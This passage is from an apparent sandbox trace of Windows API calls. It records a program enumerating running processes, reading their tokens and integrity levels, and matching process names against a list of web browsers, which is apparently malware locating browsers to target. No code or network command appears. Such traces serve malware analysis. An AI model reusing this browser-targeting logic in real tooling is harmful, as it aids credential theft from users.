TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0317.486] CloseHandle (hObject=0xb8) returned 1 [0317.486] CloseHandle (hObject=0xb4) returned 1 [0317.486] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0317.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0xb4 [0317.487] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97178, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0317.487] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0317.487] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0317.487] GetLastError () returned 0x7a [0317.487] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0317.487] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0317.487] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0317.487] CloseHandle (hObject=0xb8) returned 1 [0317.487] CloseHandle (hObject=0xb4) returned 1 [0317.487] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0317.487] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0317.487] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0317.487] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0317.487] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0317.487] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0317.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0317.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0xb4 [0317.487] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0317.487] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0317.487] GetLastError () returned 0x7a [0317.487] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0317.487] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0317.487] CloseHandle (hObject=0xb8) returned 1 [0317.487] CloseHandle (hObject=0xb4) returned 1 [0317.487] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0317.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0xb4 [0317.487] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97a80, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0317.487] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0317.487] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0317.487] GetLastError () returned 0x7a [0317.487] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0317.487] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0317.487] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0317.488] CloseHandle (hObject=0xb8) returned 1 [0317.488] CloseHandle (hObject=0xb4) returned 1 [0317.488] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0317.488] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0317.488] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0317.488] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0317.488] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0317.488] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0317.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0317.488] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0317.488] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0317.488] GetLastError () returned 0x7a [0317.488] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0317.488] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0317.488] CloseHandle (hObject=0xb8) returned 1 [0317.488] CloseHandle (hObject=0xb4) returned 1 [0317.488] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0317.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0317.488] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97e28, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0317.488] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0317.488] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0317.488] GetLastError () returned 0x7a [0317.488] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0317.488] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0317.488] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0317.488] CloseHandle (hObject=0xb8) returned 1 [0317.488] CloseHandle (hObject=0xb4) returned 1 [0317.488] lstrcmpiW (lpString1="firefox.exe", lpString2="reader_sl.exe") returned -1 [0317.488] lstrcmpiW (lpString1="chrome.exe", lpString2="reader_sl.exe") returned -1 [0317.489] lstrcmpiW (lpString1="opera.exe", lpString2="reader_sl.exe") returned -1 [0317.489] lstrcmpiW (lpString1="iexplore.exe", lpString2="reader_sl.exe") returned -1 [0317.489] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="reader_sl.exe") returned -1 [0317.489] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="reader_sl.exe") returned -1 [0317.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xb4 [0317.489] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0317.489] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0317.489] GetLastError () returned 0x7a [0317.489] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0317.489] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0317.489] CloseHandle (hObject=0xb8) returned 1 [0317.489] CloseHandle (hObject=0xb4) returned 1 [0317.489] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0317.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xb4 [0317.489] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97fc0, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0317.489] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0317.489] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0317.489] GetLastError () returned 0x7a [0317.489] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0317.489] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0317.489] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0317.489] CloseHandle (hObject=0xb8) returned 1 [0317.489] CloseHandle (hObject=0xb4) returned 1 [0317.489] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0317.489] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0317.489] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0317.489] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0317.489] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0317.489] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0317.489] VirtualFree (lpAddress=0x90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.490] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0319.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x260fd04 | out: SystemInformation=0x0, ResultLength=0x260fd04*=0xad70) returned 0xc0000004 [0319.501] VirtualAlloc (lpAddress=0x0, dwSize=0xbd70, flAllocationType=0x1000, flProtect=0x4) returned 0x90000 [0319.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x90000, Length=0xbd70, ResultLength=0x0 | out: SystemInformation=0x90000, ResultLength=0x0) returned 0x0 [0319.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0319.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0319.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0319.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0319.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0319.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0319.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0319.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0319.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0319.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0319.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0319.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0319.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0319.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0319.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0319.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0319.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0319.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0319.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0319.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0319.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb4 [0319.505] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0319.505] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0319.505] GetLastError () returned 0x7a [0319.505] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0319.505] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0319.505] CloseHandle (hObject=0xb8) returned 1 [0319.505] CloseHandle (hObject=0xb4) returned 1 [0319.505] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0319.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb4 [0319.506] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x984d8, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0319.506] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0319.506] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0319.506] GetLastError () returned 0x7a [0319.506] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0319.506] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0319.506] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0319.506] CloseHandle (hObject=0xb8) returned 1 [0319.506] CloseHandle (hObject=0xb4) returned 1 [0319.507] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0319.507] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0319.507] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0319.507] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0319.508] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0319.508] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0319.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0319.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x534) returned 0xb4 [0319.508] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0319.508] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0319.508] GetLastError () returned 0x7a [0319.508] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0319.510] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0319.510] CloseHandle (hObject=0xb8) returned 1 [0319.510] CloseHandle (hObject=0xb4) returned 1 [0319.510] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0319.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x534) returned 0xb4 [0319.511] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x96960, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0319.511] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0319.511] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0319.511] GetLastError () returned 0x7a [0319.511] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0319.511] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0319.511] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0319.511] CloseHandle (hObject=0xb8) returned 1 [0319.512] CloseHandle (hObject=0xb4) returned 1 [0319.512] lstrcmpiW (lpString1="firefox.exe", lpString2="userinit.exe") returned -1 [0319.512] lstrcmpiW (lpString1="chrome.exe", lpString2="userinit.exe") returned -1 [0319.512] lstrcmpiW (lpString1="opera.exe", lpString2="userinit.exe") returned -1 [0319.512] lstrcmpiW (lpString1="iexplore.exe", lpString2="userinit.exe") returned -1 [0319.512] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="userinit.exe") returned -1 [0319.513] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="userinit.exe") returned -1 [0319.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0xb4 [0319.513] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0319.513] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0319.513] GetLastError () returned 0x7a [0319.513] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0319.513] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0319.513] CloseHandle (hObject=0xb8) returned 1 [0319.513] CloseHandle (hObject=0xb4) returned 1 [0319.513] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0319.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0xb4 [0319.514] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x96fe0, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0319.514] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0319.514] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0319.514] GetLastError () returned 0x7a [0319.514] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0319.514] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0319.514] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0319.514] CloseHandle (hObject=0xb8) returned 1 [0319.514] CloseHandle (hObject=0xb4) returned 1 [0319.515] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0319.515] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0319.515] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0319.515] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0319.515] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") 